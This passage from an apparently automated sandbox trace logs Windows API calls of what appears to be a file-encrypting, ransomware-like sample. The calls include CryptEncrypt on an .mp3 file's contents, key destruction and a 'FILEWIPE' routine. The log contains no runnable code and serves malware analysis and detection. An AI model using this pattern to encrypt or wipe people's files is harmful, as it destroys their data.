wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.705] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.705] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.705] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xcb34, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xcb40) returned 1 [0181.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.706] CharLowerBuffW (in: lpsz="byte[52033]", cchLength=0xb | out: lpsz="byte[52033]") returned 0xb [0181.706] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.708] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.708] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.708] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0181.708] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.708] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6bb48*, pdwDataLen=0x87e820*=0xcb34, dwBufLen=0xcb40 | out: pbData=0xa6bb48*, pdwDataLen=0x87e820*=0xcb40) returned 1 [0181.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.711] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.711] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.711] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.711] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.711] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.711] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.711] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.711] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0181.711] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.711] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.712] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0181.712] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.712] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0181.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0181.716] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.716] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.716] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.724] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0181.724] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.724] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0181.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.725] CryptDestroyKey (hKey=0x90af18) returned 1 [0181.725] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.725] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.748] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.749] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.749] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.749] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0181.749] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0181.749] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.749] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.749] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0181.749] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.749] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0181.749] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.749] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0181.749] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.749] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0181.749] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.749] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0181.749] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.749] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0181.749] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.750] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0181.750] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0181.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.750] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.750] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0181.750] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0181.750] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0181.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0181.750] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0181.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.750] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.750] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0181.750] FreeLibrary (hLibModule=0x74f20000) returned 1 [0181.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.750] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.750] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.751] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.752] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.755] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.755] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0181.755] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.756] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96d1f10, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xc516f910, ftLastAccessTime.dwHighDateTime=0x1d5e463, ftLastWriteTime.dwLowDateTime=0xc516f910, ftLastWriteTime.dwHighDateTime=0x1d5e463, nFileSizeHigh=0x0, nFileSizeLow=0xcb34, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="AXe49W4a SJDN r.mp3", cAlternateFileName="AXE49W~1.MP3")) returned 0x90ae18 [0181.756] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0181.756] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0181.757] CharLowerBuffW (in: lpsz="byte[52020]", cchLength=0xb | out: lpsz="byte[52020]") returned 0xb [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0181.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0181.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0181.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.759] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0181.759] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0181.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0181.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0181.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0181.759] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0181.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0181.759] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0181.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c26d8 [0181.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c26d8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0181.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0181.760] FreeLibrary (hLibModule=0x75c90000) returned 1 [0181.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0181.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0181.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.762] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0181.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.762] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0181.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0181.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 